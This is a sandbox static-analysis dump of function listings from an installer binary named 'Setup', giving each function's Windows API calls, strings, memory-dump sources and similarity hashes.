AcquireSRWLockExclusive.KERNEL32(?), ref: 0090EBEF
AcquireSRWLockExclusive.KERNEL32(?), ref: 0090EC1D
TryAcquireSRWLockExclusive.KERNEL32(?), ref: 0090EC78
TryAcquireSRWLockExclusive.KERNEL32(?), ref: 0090EC8F

Strings

&_', xrefs: 0090EBC2

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: AcquireExclusiveLock$CurrentThread
String ID: &_'
API String ID: 66001078-2411122644
Opcode ID: 2baa2fb76362e7441d01cc90c5e7b50c3d25c62754dd88c8f9fc0df595053985
Instruction ID: cda3b93fc7b927e03a830e3f30524bfccf689d871d41e1b3f6547db4129c18d8
Opcode Fuzzy Hash: 2baa2fb76362e7441d01cc90c5e7b50c3d25c62754dd88c8f9fc0df595053985
Instruction Fuzzy Hash: C7419D7590462ADFEB20CF65C585A6AB3F9FF45310B104D2AE496D76C0D732E984CB90

Function 00730660 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 007306B2
OpenProcessToken.ADVAPI32(00000000,00000028,00000000), ref: 007306BF
GetLastError.KERNEL32 ref: 007306FD
CloseHandle.KERNEL32(00000000), ref: 00730734

Strings

SeShutdownPrivilege, xrefs: 007306CD
&_', xrefs: 00730674

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Process$CloseCurrentErrorHandleLastOpenToken
String ID: SeShutdownPrivilege$&_'
API String ID: 2767541406-2326958823
Opcode ID: 0fd89a62574ef68dcbaf1f2b16139302d461a78337030e6cfd6136d0a307ba3a
Instruction ID: aa9f96bba134255635defa27ae0589c0246d9ae4326fef4468396fa9fbf5d137
Opcode Fuzzy Hash: 0fd89a62574ef68dcbaf1f2b16139302d461a78337030e6cfd6136d0a307ba3a
Instruction Fuzzy Hash: EC315C71A442089BEF10DFA4DC59BEEBBF8FB08714F104119E515B72C0DB75A945CBA4

Function 008209E0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 76libraryloaderwindowCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(SetWindowTheme), ref: 00820AAD
SendMessageW.USER32(?,00001036,00010000,00010000), ref: 00820AF8

Part of subcall function 00911995: AcquireSRWLockExclusive.KERNEL32(00A66A70,?,?,?,006EB3A6,00A67624,275F26E1,?,?,0093CBDD,000000FF,?,008898BD,275F26E1,?), ref: 009119A0
Part of subcall function 00911995: ReleaseSRWLockExclusive.KERNEL32(00A66A70,?,?,006EB3A6,00A67624,275F26E1,?,?,0093CBDD,000000FF,?,008898BD,275F26E1,?), ref: 009119DA

Part of subcall function 007C6DB0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 007C6DF2

Part of subcall function 00911944: AcquireSRWLockExclusive.KERNEL32(00A66A70,?,?,006EB417,00A67624,009A5310), ref: 0091194E
Part of subcall function 00911944: ReleaseSRWLockExclusive.KERNEL32(00A66A70,?,?,006EB417,00A67624,009A5310), ref: 00911981
Part of subcall function 00911944: WakeAllConditionVariable.KERNEL32(00A66A6C,?,?,006EB417,00A67624,009A5310), ref: 0091198C

Strings

explorer, xrefs: 00820AD8
SetWindowTheme, xrefs: 00820AA2
UxTheme.dll, xrefs: 00820A41
&_', xrefs: 008209F3

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease$AddressConditionDirectoryMessageProcSendSystemVariableWake
String ID: SetWindowTheme$UxTheme.dll$explorer$&_'
API String ID: 1065053019-2089051050
Opcode ID: 5de248331ba8b259ede0629a1d9b228697572249bf9b7580bf29bb8791293c52
Instruction ID: eff90948758080f420cfc3ca83f35225dc270d6c17e8c8202c350fc498fcf54a
Opcode Fuzzy Hash: 5de248331ba8b259ede0629a1d9b228697572249bf9b7580bf29bb8791293c52
Instruction Fuzzy Hash: F621F275A40354BBC720DF98EC02B9D7BB4FB62B20F104325FA65972E1D7B06C819B41

Function 0091EA6C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,275F26E1,?,?,00000001,009A5060,000000FF,?,0091EA61,?,?,0091EA38,?,?), ref: 0091EAA1
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0091EAB3
FreeLibrary.KERNEL32(00000000,?,00000001,009A5060,000000FF,?,0091EA61,?,?,0091EA38,?,?), ref: 0091EAD5

Strings

mscoree.dll, xrefs: 0091EA9A
CorExitProcess, xrefs: 0091EAAB
&_', xrefs: 0091EA81

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll$&_'
API String ID: 4061214504-2669218353
Opcode ID: b06b59de20f2e000d6eae36547ab9a6908574866ff693ff8c9c47f55f998d89e
Instruction ID: 163a8f4d4fce640fb493a71d0b027e09a890ff3244011415bd525cb9065f93da
Opcode Fuzzy Hash: b06b59de20f2e000d6eae36547ab9a6908574866ff693ff8c9c47f55f998d89e
Instruction Fuzzy Hash: 8501A731A58629ABDB01CF90DC05FEEBBBCFF44B15F040525FC22A2290DB749900CAD0

Function 00706C50 Relevance: 9.3, APIs: 4, Strings: 2, Instructions: 346memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,00000000,?,00000000,275F26E1), ref: 00706D18
HeapFree.KERNEL32(00000000,?,00000000,?,00000000,275F26E1), ref: 00706D1E
GetProcessHeap.KERNEL32(009D3081,?), ref: 00706F1E
HeapFree.KERNEL32(00000000,009D3081,?), ref: 00706F24

Strings

&_', xrefs: 00706C66
#, xrefs: 00706FE3

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Heap$FreeProcess
String ID: #$&_'
API String ID: 3859560861-392022308
Opcode ID: fae48f97b4912920bfc4033202dc6e9c15b5c9a121deb8447ff4f9687af71622
Instruction ID: 298f62a14f29fdbbefa18b589b69d2109ad4096ae3ccfc16ded7e928bbb7ebd8
Opcode Fuzzy Hash: fae48f97b4912920bfc4033202dc6e9c15b5c9a121deb8447ff4f9687af71622
Instruction Fuzzy Hash: 35E15571E05249DFDF18CFA8D9547EEBBF5AF44314F2442AAE800A72D0D7786A05CBA1

Function 0092A775 Relevance: 9.3, APIs: 6, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50e179a347213f081b0d50d5bb23ddd6e39e7e56abcdf5414d6aabb7086c31ad
Instruction ID: 5c98a722ac20b4caae6996305dbef849be46f0bb763ef8cc9a93d486656620b3
Opcode Fuzzy Hash: 50e179a347213f081b0d50d5bb23ddd6e39e7e56abcdf5414d6aabb7086c31ad
Instruction Fuzzy Hash: E1B147339003669FDB11CF64D881BEEBBB5EF59300F254156E944AB286D2749D41CBA2

Function 00725330 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 414COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00725864

Strings

&_', xrefs: 00725354, 007257C7
d, xrefs: 0072558E
Component, xrefs: 007253A6
&_', xrefs: 00725347, 00725807

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: Component$d$&_'$&_'
API String ID: 885266447-1401317474
Opcode ID: 363d6943a8ad3e6c8b617d5b97659d4d171fb01463df97a5b33d8d5df661a237
Instruction ID: 124f0257ea2e2aa9bc4c254a5dafba1b05d545df7f1c35baa5a3814dfcf097b4
Opcode Fuzzy Hash: 363d6943a8ad3e6c8b617d5b97659d4d171fb01463df97a5b33d8d5df661a237
Instruction Fuzzy Hash: CB026971D00218DFDB24CFA4D884BEEBBB5FF49314F248199E509A7291DB74AA84CF90

Function 008808B0 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 148COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00880910

Strings

HTTP/1.0, xrefs: 00881914
GET, xrefs: 00880AD4
FTP Server, xrefs: 008814A8, 008814BA, 008814C4
Local Network Server, xrefs: 008811C8, 008811DA, 008811E4
&_', xrefs: 008808C7, 00880B67, 00880CB7, 00881036, 00881387, 00881839

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ErrorLast
String ID: FTP Server$GET$HTTP/1.0$Local Network Server$&_'
API String ID: 1452528299-2319638710
Opcode ID: 86bead7d7e2479b0a783ab01101d0bbe55a1263eee6106aeb2191df3199a7a9c
Instruction ID: cd5cd82af4160e3ef9f6795ba53ca87a3e99a607379efd0bee362419cf99a9e8
Opcode Fuzzy Hash: 86bead7d7e2479b0a783ab01101d0bbe55a1263eee6106aeb2191df3199a7a9c
Instruction Fuzzy Hash: A34194B1E013199BDB10EFE5CC49BAEBBB8FF44720F104519E925E7281DB7499058FA1

Function 0092CA6E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 333fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(275F26E1,00000000,00000000,?), ref: 0092CAD1

Part of subcall function 009318F9: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,00000000,?,-00000008,-00000008,00000000,?,?,0092C8C2,?,00000000), ref: 00931958

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0092CD27
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0092CD6D
GetLastError.KERNEL32 ref: 0092CE10

Strings

&_', xrefs: 0092CA84

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID: &_'
API String ID: 2112829910-2411122644
Opcode ID: f4a1501ee52fe39ff65c5ce3676d3fe5bd46259a9c98f86b550405d865ffb2f3
Instruction ID: adf77e29e320435a439feec233c036ba4cbf4f25eef819dbc6a720059ffbf0bb
Opcode Fuzzy Hash: f4a1501ee52fe39ff65c5ce3676d3fe5bd46259a9c98f86b550405d865ffb2f3
Instruction Fuzzy Hash: 40D19CB5D042589FCF15CFE8D880AADBBB9FF49310F24452AE866EB255D730AD42CB50

Function 0071C790 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 310windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,RichEdit20W,?,?,00000000,80000000,00000000,00000000,00000000,00000000,00000000), ref: 0071C96B
SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 0071C97A
SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 0071C986

Part of subcall function 006EAF70: RtlAllocateHeap.NTDLL(?,00000000,?,275F26E1,00000000,0093C660,000000FF,?,?,00A5D9BC,?,00000000,0088F88B,8000000B,275F26E1), ref: 006EAFBA

Strings

RichEdit20W, xrefs: 0071C963
&_', xrefs: 0071C7A4, 008B09D7

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: MessageSend$AllocateCreateHeapWindow
String ID: RichEdit20W$&_'
API String ID: 2359350451-2442047032
Opcode ID: 7592cebc5ea123f895aca22c7f25fd4e028c76e76fa8ce481b81134da34aa920
Instruction ID: 3ec61be723b6c2e9304577bc221412956c56705b27d8a1fef1c0ab7deda2a532
Opcode Fuzzy Hash: 7592cebc5ea123f895aca22c7f25fd4e028c76e76fa8ce481b81134da34aa920
Instruction Fuzzy Hash: D4C1AA71E002189FDB05CFA8C894BEEBBB5FF48310F14456AE811AB391CB74AD41CB94

Function 0091321A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00913211,009131D4,?,?,0072449D,00842630,?,00000008), ref: 00913228
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00913236
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0091324F
SetLastError.KERNEL32(00000000,00913211,009131D4,?,?,0072449D,00842630,?,00000008), ref: 009132A1

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 41dcedf321a913b4d0c09d5e9f77a4ce22f3cadba426d63aa37a49638e453682
Instruction ID: b0422bbfc790dc2c19d5555f0b77532ff21de6b274e07018998f88a37832bc76
Opcode Fuzzy Hash: 41dcedf321a913b4d0c09d5e9f77a4ce22f3cadba426d63aa37a49638e453682
Instruction Fuzzy Hash: 0901D83332D3295EBE2437B4BC866EA27B9DF427707608729F420910F0EF614E825150

Function 0083EFE0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 253COMMON

Download Yara Rule

APIs

Part of subcall function 0084DD80: SHGetSpecialFolderLocation.SHELL32(00000000,00000023,?,?,80000002,80000002,00A68370), ref: 0084DD90
Part of subcall function 0084DD80: LoadLibraryW.KERNEL32(Shell32.dll,?,80000002,80000002,00A68370), ref: 0084DDA3
Part of subcall function 0084DD80: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0084DDB3

PathFileExistsW.SHLWAPI(?,ADVINST_LOGS,0000000C,00A68370), ref: 0083F0D0

Part of subcall function 006EAF70: RtlAllocateHeap.NTDLL(?,00000000,?,275F26E1,00000000,0093C660,000000FF,?,?,00A5D9BC,?,00000000,0088F88B,8000000B,275F26E1), ref: 006EAFBA

Strings

&_', xrefs: 0083EFF7
Everyone, xrefs: 0083F0F3
ADVINST_LOGS, xrefs: 0083F0C3

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: AddressAllocateExistsFileFolderHeapLibraryLoadLocationPathProcSpecial
String ID: ADVINST_LOGS$Everyone$&_'
API String ID: 3321256476-1135648432
Opcode ID: afdf0b7ecf9ea853108d810122c658810bd0b360508aa8f55a64341592d521fe
Instruction ID: cb98001bf0abeba4543d103a5b2ede6761fe373a2777fb55f4496d5cd90c70a9
Opcode Fuzzy Hash: afdf0b7ecf9ea853108d810122c658810bd0b360508aa8f55a64341592d521fe
Instruction Fuzzy Hash: 32A1DE71D01208DBDB04DFA8C955BAEBBB1FF84314F244168EA11AB392DB356E05CBD1

Function 00716AC0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 234windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006EAF70: RtlAllocateHeap.NTDLL(?,00000000,?,275F26E1,00000000,0093C660,000000FF,?,?,00A5D9BC,?,00000000,0088F88B,8000000B,275F26E1), ref: 006EAFBA

Part of subcall function 00820530: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037,?,?,?,00000000,?,0070F628,?,80004005,?), ref: 008205BA
Part of subcall function 00820530: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 008205F4

SendMessageW.USER32(?,00001036,00000004,00000004), ref: 00716C91
SendMessageW.USER32(?,00001036,00000400,00000400), ref: 00716CAC
SendMessageW.USER32(?,00001061,00000000,?), ref: 00716D0C

Strings

QuickSelectionList, xrefs: 00716BA8, 00716BBA, 00716BC4
&_', xrefs: 00716AD4

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: MessageSend$AllocateHeapWindow
String ID: QuickSelectionList$&_'
API String ID: 3168177373-713902887
Opcode ID: d816f79d8a861ab1d971fe9964c32a6b17c008ba02a5b40be1311407339b48ed
Instruction ID: 1d13713bfe03ca35ca2458f3d82a1289399bdc4c17acbc23c7b0a4a2e7fe71c2
Opcode Fuzzy Hash: d816f79d8a861ab1d971fe9964c32a6b17c008ba02a5b40be1311407339b48ed
Instruction Fuzzy Hash: 5F81CC71A043099FCB04DFA8D894BEEBBF5FF88324F10452AE915A7391DB74A941CB91

Function 00705290 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 228COMMON

Download Yara Rule

APIs

PathIsUNCW.SHLWAPI(?,?,00000000,?,275F26E1,*.*,?), ref: 00705384

Strings

*.*, xrefs: 007052A6
\\?\UNC\, xrefs: 007053A6, 00705485
\\?\, xrefs: 0070549E, 00705509
&_', xrefs: 007052A7

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Path
String ID: *.*$\\?\$\\?\UNC\$&_'
API String ID: 2875597873-3027919815
Opcode ID: 1acb9d0780e73e47acdaf85046f7ffc17e4d0e2d2d31583dfe402a8d0f0a66c3
Instruction ID: a2cfb24442a85ba43ed9829e8ed6bfaf040b2e18fa918da1ce9f0c5424189032
Opcode Fuzzy Hash: 1acb9d0780e73e47acdaf85046f7ffc17e4d0e2d2d31583dfe402a8d0f0a66c3
Instruction Fuzzy Hash: FF81AB70A00A05CBDB14DFA8C859BBEB7E6EF04728F144269E515AB3D1CB799E41CF90

Function 0088E1D0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 195synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,275F26E1), ref: 0088E207

Part of subcall function 0082B5C0: MultiByteToWideChar.KERNEL32(00000003,00000000,0086E395,000000FF,00000000,00000000,00000000,?,?,0086E395,009D5C9A), ref: 0082B5D8
Part of subcall function 0082B5C0: MultiByteToWideChar.KERNEL32(00000003,00000000,0086E395,000000FF,?,-00000001,?,0086E395,009D5C9A), ref: 0082B60A

Strings

*.*, xrefs: 0088E29D, 0088E2B8
